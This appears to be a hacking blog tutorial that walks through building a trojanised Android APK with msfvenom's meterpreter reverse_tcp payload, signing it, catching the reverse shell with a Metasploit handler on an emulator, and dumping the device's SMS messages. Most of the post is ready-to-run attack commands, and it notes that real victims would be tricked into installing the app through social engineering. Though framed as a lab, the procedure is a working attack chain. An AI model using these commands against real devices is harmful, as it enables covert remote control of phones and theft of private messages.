• Lucifer

Android Exploitation

In previous posts, we saw how Android devices can be used for penetration testing. Let’s reverse the sides and use our Android device as the target. In this post, we will learn how to create an APK file using the tools offered by Metasploit Framework. We will focus on Metasploit's Android-based payloads and use msfvenom to create the APK file.

Android Exploitation

Step 1: Creating APK

Enter the following command to generate the APK file that will be distributed to the victim:

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > SignApk/evilAndroid.apk

Android Exploitation

We are entering for "local host" because this is the IP that the emulator uses to communicate with the host computer.

It will take 2-3 minutes for the file to be created.

Step 2: Changing Directories

Once our APK is created, we will need to sign the file. This is an essential step because most Android devices won't install unsigned applications. Signing an APK is a multi-step process, however, we can simplify it by using a pre-generated certificate and key files with the signapk.jar utility. We saved them all in the same directory where we put our APK. Change to this directory as follows:

cd SignApk

Android Exploitation

Step 3: Signing APK

Run the command below to sign the APK. Our signed file will be saved as evilAndroidc.apk.

java -jar signapk.jar certificate.pem key.pk8 evilAndroid.apk evilAndroidc.apk

Android Exploitation

To make sure that the file was created, do the listing of the working directory:


Step 4: Starting Metasploit Listener

Now let's start Metasploit listener. We've done the step-by-step setup in other labs, now let's do it it all at once, with a one-liner command:

msfconsole -L -q -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST; set LPORT 4444; run"

Android Exploitation

The -q option is for "quiet" which disables the displaying banner and version information. Note that we are using the actual localhost IP this time, not the one that Android uses.

Now open up a new tab with help of the following command: Ctrl + Shift + T

Step 5: Starting Android Emulator

Enter the following command to start the Android emulator instance that we will use as our target:

android-sdk-linux/tools/emulator @android17 -no-window

Android Exploitation

It may take several minutes for the emulator instance to start. Be patient.

Step 6: Migrating Consoles

Next, we need to upload our malicious APK. In a real life scenario, you will need to use some social engineering techniques to trick the device owner into downloading and installing your APK. Let's say we did that and now we will play the victim.

Open up a new tab "Tab 3".

Step 7: Installing APK

To install the APK, enter the command below. Make sure to use the signed version of the APK: evilAdnroidc.apk, not the original evilAndroid.apk:

adb install SignApk/evilAndroidc.apk

Android Exploitation

You will get the "device offline" error at first: it takes some time for the emulated device to connect to the ADB server. If returned to prompt, try again. Keep re-entering the command until you see the "Success" message (you may have to try several times).

Step 8: Launching App

Next, we need to launch the application. Opening apps from command line is a bit tricky: you need to know the name of the package and of the Activity. We looked it up for you, so just enter the following command to run the app:

adb shell am start com.metasploit.stage/.MainActivity

Android Exploitation

Step 9: Getting a Shell

Now go back to the Metasploit listener running in "Console Tab 1".

Android Exploitation

We got a Meterpreter shell!

Step 10: Using Meterpreter on Android

Android Meterpreter is similar to the Linux version that we used in other labs, however, it has some unique options as well. Enter help to see the available commands.


Android Exploitation

Step 11: Getting System Information

Enter sysinfo to get information about the target system:


Android Exploitation

Step 12: Migrating Consoles

One of the most useful Meterpreter options is dump_sms, which does just that: dumping all SMS messages from the device into a text file.

Migrate to "Console tab 3" to send an SMS message to our device.

Step 13: Sending SMS

We can use Telnet to send SMS messages to emulated devices. First, open a Telnet session as follows:

telnet localhost 5554

Android Exploitation

Next, enter sms send followed by a phone number and message. You can use any values for these, just don't include any dashes in the phone number and make sure that your message is in quotes, for example:

sms send 1112223333 "Hey there"

Now again switch back to console tab 1.

Step 14: Dumping SMS

Enter the* dump_sms *command:


Android Exploitation

Note the name of the dump file. It will be saved in the current working directory. Enter exit twice to close the Meterpreter shell and exit out of Metasploit.

Step 15: Reading SMS Dump

Enter the following command to read the SMS file (enter the file name with your timestamp):

cat sms_dump_<timestamp>.txt

Android Exploitation

We can see the contents of the messages as well as the associated metadata.

Also read: Hacking with Android

That's it for this post hope you like it, please share it with your friends and more amazing stuff is waiting for you, checkout shop at Payground or visit HERE.

47 views0 comments

Recent Posts

See All

©2020 by Payground. Proudly created with Wix.com